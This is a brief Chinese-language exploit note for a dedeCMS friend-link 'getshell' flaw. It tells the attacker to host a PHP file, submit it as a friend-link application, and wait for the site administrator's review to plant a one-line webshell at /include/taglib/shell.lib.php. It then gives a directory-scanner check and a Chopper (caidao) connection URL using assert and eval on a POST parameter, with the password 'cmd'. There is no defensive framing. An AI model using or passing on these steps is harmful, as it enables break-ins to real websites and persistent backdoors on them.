dedeCMS友情链接getshell漏洞

使用

代码存为PHP文件,上传到你的空间。去提前友连申请,网址填写你上传后的地址。

站长审核后台友情连接时会生成一句话地址为/include/taglib/shell.lib.php
御剑字典添加/include/taglib/shell.lib.php测试是否存活即可
最后菜刀访问传参一句话http://site.com/include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);
密码为cmd